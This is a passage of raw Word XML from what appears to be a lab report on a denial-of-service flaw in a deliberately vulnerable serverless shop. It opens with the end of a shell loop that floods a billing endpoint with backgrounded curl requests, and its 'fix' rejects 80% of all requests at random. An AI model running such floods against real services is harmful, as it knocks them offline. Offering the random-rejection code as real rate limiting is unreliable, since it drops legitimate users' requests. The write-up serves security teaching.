    <w:p w14:paraId="61C0C3D6" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t xml:space="preserve">  --data-raw "{\"action\":\"billing\",\"order-id\":\"$ORDER_ID\",\"data\":{\"ccn\":\"4545454545454545\",\"exp\":\"04/41\",\"cvv\":\"471\"}}" &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B25CD85" w14:textId="77777777" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5109F076" w14:textId="344A4CEC" w:rsidR="00C34DD1" w:rsidRPr="00C34DD1" w:rsidRDefault="00C34DD1" w:rsidP="00C34DD1">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34DD1">
        <w:t>wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16284B85" w14:textId="63FA8101" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Evidence and Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E7E7EA" w14:textId="77777777" w:rsidR="00EB1412" w:rsidRDefault="00EB1412" w:rsidP="00EB1412">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C7047B4" wp14:editId="575C4CB7">
            <wp:extent cx="5943600" cy="2481606"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75870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481606"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D899151" w14:textId="6A618C49" w:rsidR="00BA72A1" w:rsidRDefault="00EB1412" w:rsidP="00EB1412">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EB1412">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Create order successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D6799" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00A24406"/>
    <w:p w14:paraId="31F52684" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00A24406">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A07FA36" wp14:editId="27686BCA">
            <wp:extent cx="5943600" cy="1462246"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1660185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462246"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6F951" w14:textId="73A30006" w:rsidR="00A24406" w:rsidRPr="00A24406" w:rsidRDefault="00A24406" w:rsidP="00A24406">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Update the order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BD7068" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="27B204F7" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="751DB2D9" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="7D50EBFC" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00A24406">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00A24406">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0641C20A" wp14:editId="59551F8D">
            <wp:extent cx="5943600" cy="2035416"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="9402818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035416"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BDA505" w14:textId="3CCCF2B5" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00A24406">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A24406">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Single billing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B72C28" w14:textId="77777777" w:rsidR="00E933FA" w:rsidRDefault="00E933FA" w:rsidP="00E933FA"/>
    <w:p w14:paraId="1FD5664C" w14:textId="77777777" w:rsidR="00E933FA" w:rsidRDefault="00E933FA" w:rsidP="00E933FA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00E933FA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="050034D7" wp14:editId="79641A75">
            <wp:extent cx="5943600" cy="2776226"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="11541783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776226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F7D1E7" w14:textId="074BDCF2" w:rsidR="00E933FA" w:rsidRPr="00E933FA" w:rsidRDefault="00E933FA" w:rsidP="00E933FA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00E933FA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:Denial of Service (DoS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA93D9" w14:textId="77777777" w:rsidR="00E933FA" w:rsidRDefault="00E933FA" w:rsidP="00E933FA"/>
    <w:p w14:paraId="700F41D9" w14:textId="77777777" w:rsidR="00F42FDC" w:rsidRDefault="00F42FDC" w:rsidP="00F42FDC">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F42FDC">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F05ED14" wp14:editId="33F9BDBD">
            <wp:extent cx="5943600" cy="2229673"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="53298842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229673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="016510E8" w14:textId="40F8ECFF" w:rsidR="00F42FDC" w:rsidRPr="00F42FDC" w:rsidRDefault="00F42FDC" w:rsidP="00F42FDC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00F42FDC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F04F3C" w14:textId="77777777" w:rsidR="00F42FDC" w:rsidRPr="00A24406" w:rsidRDefault="00F42FDC" w:rsidP="00E933FA"/>
    <w:p w14:paraId="6A6F4542" w14:textId="77777777" w:rsidR="00A24406" w:rsidRDefault="00A24406" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="36808C12" w14:textId="69F6349B" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Fix Strategy / Probable Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13920742" w14:textId="42130EBA" w:rsidR="00B81965" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerability is mitigated by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642D284B" w14:textId="77777777" w:rsidR="00B81965" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Introducing request control logic in Lambda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B4816C" w14:textId="4FE2924A" w:rsidR="00B81965" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Blocking excessive requests early before vulnerable code executes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8BBA2E" w14:textId="1C71AC10" w:rsidR="00B81965" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Approach used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E726D19" w14:textId="77777777" w:rsidR="00B81965" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Implement a simple rate-limiting mechanism inside the Lambda function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922730" w14:textId="2FBFE7A0" w:rsidR="00BA72A1" w:rsidRDefault="00B81965" w:rsidP="00B81965">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Rejecting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a portion of incoming requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931D0A0" w14:textId="77777777" w:rsidR="00C42F17" w:rsidRDefault="00C42F17" w:rsidP="00C42F17">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F5C13F" w14:textId="77777777" w:rsidR="00C42F17" w:rsidRDefault="00C42F17" w:rsidP="00C42F17">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42F17">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75BE3003" wp14:editId="068548B0">
            <wp:extent cx="5943600" cy="1465157"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="15217145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1465157"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C44C7A6" w14:textId="656DC461" w:rsidR="00C42F17" w:rsidRDefault="00C42F17" w:rsidP="00C42F17">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F33B81">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Change the rate and Bust in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GateWay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C42F17">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130DF16D" w14:textId="77777777" w:rsidR="00F9724F" w:rsidRDefault="00F9724F" w:rsidP="00F9724F"/>
    <w:p w14:paraId="54750134" w14:textId="77777777" w:rsidR="00F9724F" w:rsidRPr="00C42F17" w:rsidRDefault="00F9724F" w:rsidP="00F9724F"/>
    <w:p w14:paraId="49F97FDD" w14:textId="77777777" w:rsidR="00C42F17" w:rsidRDefault="00C42F17" w:rsidP="00C42F17">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="552C5CEC" w14:textId="77777777" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00BA72A1"/>
    <w:p w14:paraId="6796CFD0" w14:textId="3F83F2C2" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:lastRenderedPageBreak/>
        <w:t>Code / Config Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C7A49" w14:textId="2D19DA1A" w:rsidR="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Added at the beginning of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lambda_handler</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BC02BB" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1B354" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.random</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() &lt; 0.8:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27306589" w14:textId="4F094680" w:rsidR="00BA72A1" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    return {"status": "err", "msg": "Too Many Requests"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654487CA" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0591FC38" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRPr="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00304AC5">
        <w:t>This ensures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C859270" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRPr="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00304AC5">
        <w:t xml:space="preserve">Requests are partially blocked </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F9EF7" w14:textId="77777777" w:rsidR="00304AC5" w:rsidRPr="00304AC5" w:rsidRDefault="00304AC5" w:rsidP="00304AC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00304AC5">
        <w:t xml:space="preserve">Backend load is reduced </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C92FFAA" w14:textId="76B13418" w:rsidR="00BA72A1" w:rsidRDefault="00304AC5" w:rsidP="0059634F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00304AC5">
        <w:t>Vulnerable logic is not executed for all requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8A6F8" w14:textId="3340FA1F" w:rsidR="00BA72A1" w:rsidRDefault="00BA72A1" w:rsidP="00956299">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA72A1">
        <w:t>Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260AE71" w14:textId="77777777" w:rsidR="0059634F" w:rsidRPr="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021116F2" w14:textId="77777777" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Created a new order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22353261" w14:textId="587FB9FE" w:rsidR="00BA72A1" w:rsidRDefault="0059634F" w:rsidP="00EA7EB1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Repeated the same DoS attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A49B65" w14:textId="52E4EAD5" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Observed Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCDC91" w14:textId="13537062" w:rsidR="0059634F" w:rsidRDefault="0059634F" w:rsidP="0059634F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059634F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
